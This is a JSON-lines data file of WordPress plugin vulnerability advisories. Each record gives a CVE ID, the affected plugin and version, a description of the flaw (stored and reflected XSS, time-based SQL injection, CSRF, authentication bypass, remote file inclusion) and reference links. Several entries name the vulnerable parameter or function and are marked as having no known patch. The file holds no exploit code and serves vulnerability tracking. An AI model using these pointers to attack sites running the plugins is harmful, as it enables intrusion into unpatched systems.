{"CVE_ID":"CVE-2024-9581","slug":"shortcodes-anywhere","versionImpact":"1.0.1","description":"The Shortcodes AnyWhere plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.0.1. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e289b06-66c8-4d50-a8f7-e07c5ae8f7c8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e289b06-66c8-4d50-a8f7-e07c5ae8f7c8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-anywhere\\\/trunk\\\/core\\\/shortcodeEverywhere.class.php#L15\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-anywhere\\\/trunk\\\/core\\\/shortcodeEverywhere.class.php#L15\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10015","slug":"convertcalculator","versionImpact":"1.1.1","description":"The ConvertCalculator for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'id' and 'type' parameters in all versions up to, and including, 1.1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c1f55b51-cc93-4f45-9666-03740e147277?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c1f55b51-cc93-4f45-9666-03740e147277?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/convertcalculator\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/convertcalculator\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11732","slug":"bp-profile-shortcodes-extra","versionImpact":"2.6.0","description":"The BP Profile Shortcodes Extra plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018tab\u2019 parameter in all versions up to, and including, 2.6.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bp-profile-shortcodes-extra\\\/tags\\\/2.6.0\\\/inc\\\/bppsc-shortcodes-extra.php#L1694\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bp-profile-shortcodes-extra\\\/tags\\\/2.6.0\\\/inc\\\/bppsc-shortcodes-extra.php#L1694\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bp-profile-shortcodes-extra\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bp-profile-shortcodes-extra\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d7324a4e-ff45-4908-bcaa-379b130f73c0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d7324a4e-ff45-4908-bcaa-379b130f73c0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11338","slug":"pixnet","versionImpact":"2.9.10","description":"The PIXNET Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'gtm' and 'venue' parameters in all versions up to, and including, 2.9.10 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pixnet\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pixnet\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/165bafd4-0cef-4936-af21-6a8ffcfccaef?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/165bafd4-0cef-4936-af21-6a8ffcfccaef?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13462","slug":"wp-wiki-tooltip","versionImpact":"2.0.2","description":"The WP Wiki Tooltip plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wiki' shortcode in all versions up to, and including, 2.0.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-wiki-tooltip\\\/trunk\\\/class.wp-wiki-tooltip.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-wiki-tooltip\\\/trunk\\\/class.wp-wiki-tooltip.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-wiki-tooltip\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-wiki-tooltip\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/926646de-4fb0-4460-b0d1-4d451e6505ca?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/926646de-4fb0-4460-b0d1-4d451e6505ca?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13668","slug":"wordpress-activity-o-meter","versionImpact":"1","description":"The WordPress Activity O Meter WordPress plugin through 1.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admins.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a7bfc094-b235-419d-882d-96b439651f65\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a7bfc094-b235-419d-882d-96b439651f65\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-46533","slug":"landing-pages-and-domain-aliases","versionImpact":"0.8","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in wpdrift.no Landing pages and Domain aliases for WordPress allows Stored XSS. This issue affects Landing pages and Domain aliases for WordPress: from n\/a through 0.8.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/landing-pages-and-domain-aliases\\\/vulnerability\\\/wordpress-landing-pages-and-domain-aliases-for-wordpress-0-8-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/landing-pages-and-domain-aliases\\\/vulnerability\\\/wordpress-landing-pages-and-domain-aliases-for-wordpress-0-8-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6713","slug":"pvn-auth-popup","versionImpact":"1.0.0","description":"The PVN Auth Popup WordPress plugin through 1.0.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/24685b19-0a44-411a-9e1b-d4d0627d7cb6\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/24685b19-0a44-411a-9e1b-d4d0627d7cb6\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1930","slug":"wp-fastest-cache","versionImpact":"1.1.2","description":"The WP Fastest Cache plugin for WordPress is vulnerable to unauthorized data deletion due to a missing capability check on the wpfc_clear_cache_of_allsites_callback function in versions up to, and including, 1.1.2. This makes it possible for authenticated attackers with subscriber-level access to delete caches.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bae67a68-4bd1-4b52-b3dd-af0eef014028?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bae67a68-4bd1-4b52-b3dd-af0eef014028?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2893158\\\/wp-fastest-cache\\\/trunk\\\/wpFastestCache.php?contextall=1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2893158\\\/wp-fastest-cache\\\/trunk\\\/wpFastestCache.php?contextall=1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2298","slug":"meeting-scheduler-by-vcita","versionImpact":"4.2.10","description":"The Online Booking & Scheduling Calendar for WordPress by vcita plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'business_id' parameter in versions up to, and including, 4.2.10 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e6a0bf9-4767-4d4c-9a1e-adcb3c7719d9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e6a0bf9-4767-4d4c-9a1e-adcb3c7719d9?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.jonh.eu\\\/blog\\\/security-vulnerabilities-in-wordpress-plugins-by-vcita\",\"name\":\"https:\\\/\\\/blog.jonh.eu\\\/blog\\\/security-vulnerabilities-in-wordpress-plugins-by-vcita\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/meeting-scheduler-by-vcita\\\/trunk\\\/vcita-api-functions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/meeting-scheduler-by-vcita\\\/trunk\\\/vcita-api-functions.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-29434","slug":"optin-forms","versionImpact":"1.3.1","description":"Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in FancyThemes Optin Forms \u2013 Simple List Building Plugin for WordPress plugin <=\u00a01.3.1 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/optin-forms\\\/wordpress-optin-forms-plugin-1-3-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/optin-forms\\\/wordpress-optin-forms-plugin-1-3-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4282","slug":"embedpress","versionImpact":"3.8.2","description":"The EmbedPress plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'admin_post_remove' and 'remove_private_data' functions in versions up to, and including, 3.8.2. This makes it possible for authenticated attackers with subscriber privileges or above, to delete plugin settings.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2950211\\\/embedpress#file18\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2950211\\\/embedpress#file18\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embedpress\\\/tags\\\/3.8.2\\\/EmbedPress\\\/ThirdParty\\\/Googlecalendar\\\/Embedpress_Google_Helper.php#L801\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embedpress\\\/tags\\\/3.8.2\\\/EmbedPress\\\/ThirdParty\\\/Googlecalendar\\\/Embedpress_Google_Helper.php#L801\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embedpress\\\/tags\\\/3.8.2\\\/EmbedPress\\\/ThirdParty\\\/Googlecalendar\\\/Embedpress_Google_Helper.php#L807\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embedpress\\\/tags\\\/3.8.2\\\/EmbedPress\\\/ThirdParty\\\/Googlecalendar\\\/Embedpress_Google_Helper.php#L807\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5fa2ec9e-2859-4a96-9e33-9e22d37e544f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5fa2ec9e-2859-4a96-9e33-9e22d37e544f?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0514","slug":"royal-elementor-addons","versionImpact":"1.3.87","description":"The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.87. This is due to missing or incorrect nonce validation on the add_to_compare function. This makes it possible for unauthenticated attackers to add items to user compare lists via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b0955689-43a0-442c-974b-5db5e4171f6a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b0955689-43a0-442c-974b-5db5e4171f6a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5729","slug":"simple-al-slider","versionImpact":"1.2.10","description":"The Simple AL Slider WordPress plugin through 1.2.10 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0352f6f5-cdfd-4cef-9ed5-fdc1cbcb368a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0352f6f5-cdfd-4cef-9ed5-fdc1cbcb368a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8742","slug":"essential-addons-for-elementor-lite","versionImpact":"6.0.3","description":"The Essential Addons for Elementor \u2013 Best Elementor Addon, Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Filterable Gallery widget in all versions up to, and including, 6.0.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/76c292dc-e9da-4256-82df-58ac5def4771?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/76c292dc-e9da-4256-82df-58ac5def4771?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/tags\\\/6.0.3\\\/includes\\\/Elements\\\/Filterable_Gallery.php#L566\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/tags\\\/6.0.3\\\/includes\\\/Elements\\\/Filterable_Gallery.php#L566\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3148624\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3148624\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/essential-addons-for-elementor-lite\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/essential-addons-for-elementor-lite\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9522","slug":"wp-users-masquerade","versionImpact":"2.0.0","description":"The WP Users Masquerade plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 2.0.0. This is due to incorrect authentication and capability checking in the 'ajax_masq_login' function. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to log in as any existing user on the site, such as an administrator.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4a4f0909-76f6-4d27-87b1-f6cd5f5cbbb7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4a4f0909-76f6-4d27-87b1-f6cd5f5cbbb7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-users-masquerade\\\/trunk\\\/masquerade.php?rev=1703860#L162\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-users-masquerade\\\/trunk\\\/masquerade.php?rev=1703860#L162\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-54233","slug":"advanced-control-manager","versionImpact":"2.16.0","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Enea Overclokk Advanced Control Manager for WordPress by ItalyStrap allows Reflected XSS.This issue affects Advanced Control Manager for WordPress by ItalyStrap: from n\/a through 2.16.0.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/advanced-control-manager\\\/vulnerability\\\/wordpress-advanced-control-manager-plugin-2-16-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/advanced-control-manager\\\/vulnerability\\\/wordpress-advanced-control-manager-plugin-2-16-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11337","slug":"horoscope-and-tarot","versionImpact":"1.3.0","description":"The Horoscope And Tarot plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'divine_horoscope' shortcode in all versions up to, and including, 1.3.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/horoscope-and-tarot\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/horoscope-and-tarot\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d833338-a343-446f-a3f1-cb5e2cff6585?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d833338-a343-446f-a3f1-cb5e2cff6585?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13405","slug":"apptivo-business-site","versionImpact":"5.3","description":"The Apptivo Business Site CRM plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 5.3. This is due to missing or incorrect nonce validation on the 'awp_ip_deny' page. This makes it possible for unauthenticated attackers to block IP addresses via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/apptivo-business-site\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/apptivo-business-site\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f8225e3c-5413-4406-a31b-80829b6b330a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f8225e3c-5413-4406-a31b-80829b6b330a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3832","slug":"fusedesk","versionImpact":"6.7","description":"The FuseDesk plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018successredirect\u2019 parameter in all versions up to, and including, 6.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fusedesk\\\/trunk\\\/fusedesk.php#L516\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fusedesk\\\/trunk\\\/fusedesk.php#L516\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fusedesk\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fusedesk\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/baf12413-eb45-44c3-a6c9-f5a048d6500d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/baf12413-eb45-44c3-a6c9-f5a048d6500d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6712","slug":"mapfig-studio","versionImpact":"0.2.1","description":"The MapFig Studio WordPress plugin through 0.2.1 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0346b62c-a856-4554-a24a-ef2c2943bda9\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0346b62c-a856-4554-a24a-ef2c2943bda9\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4488","slug":"widgets-on-pages","versionImpact":"1.6.0","description":"The Widgets on Pages WordPress plugin through 1.6.0 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e52c18a9-550a-40b1-a413-0e06e5b4aabc\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e52c18a9-550a-40b1-a413-0e06e5b4aabc\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1929","slug":"wp-fastest-cache","versionImpact":"1.1.2","description":"The WP Fastest Cache plugin for WordPress is vulnerable to unauthorized data modification due to a missing capability check on the wpfc_purgecache_varnish_callback function in versions up to, and including, 1.1.2. This makes it possible for authenticated attackers with subscriber-level access to purge the varnish cache.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2893158\\\/wp-fastest-cache\\\/trunk\\\/wpFastestCache.php?contextall=1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2893158\\\/wp-fastest-cache\\\/trunk\\\/wpFastestCache.php?contextall=1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3412","slug":"image-map-pro-lite","versionImpact":"1.0.0","description":"The Image Map Pro \u2013 Drag-and-drop Builder for Interactive Images \u2013 Lite plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.0.0. This is due to a missing capability check on the ajax_store_save() function. This makes it possible for authenticated attackers, with minimal permissions such as a subscriber, to modify plugin settings and inject malicious web scripts.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b58403df-af09-4d74-88e6-140e3f2f291b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b58403df-af09-4d74-88e6-140e3f2f291b?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-map-pro-lite\\\/trunk\\\/image-map-pro-wordpress-lite.php#L410\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-map-pro-lite\\\/trunk\\\/image-map-pro-wordpress-lite.php#L410\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3452","slug":"canto","versionImpact":"3.0.4","description":"The Canto plugin for WordPress is vulnerable to Remote File Inclusion in versions up to, and including, 3.0.4 via the 'wp_abspath' parameter. This allows unauthenticated attackers to include and execute arbitrary remote code on the server, provided that allow_url_include is enabled. Local File Inclusion is also possible, albeit less useful because it requires that the attacker be able to upload a malicious php file via FTP or some other means into a directory readable by the web server.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a76077c6-700a-4d21-a930-b0d6455d959c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a76077c6-700a-4d21-a930-b0d6455d959c?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2951888\\\/canto\\\/trunk\\\/includes\\\/lib\\\/tree.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2951888\\\/canto\\\/trunk\\\/includes\\\/lib\\\/tree.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/canto\\\/trunk\\\/includes\\\/lib\\\/tree.php?rev=2841358#L5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/canto\\\/trunk\\\/includes\\\/lib\\\/tree.php?rev=2841358#L5\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0513","slug":"royal-elementor-addons","versionImpact":"1.3.87","description":"The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.87. This is due to missing or incorrect nonce validation on the remove_from_wishlist function. This makes it possible for unauthenticated attackers to remove items from user wishlists via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3d3516e7-cce4-4def-be38-d16be3110d59?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3d3516e7-cce4-4def-be38-d16be3110d59?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88\",\"refsource\":\"\",\"tags\":[]}]"}
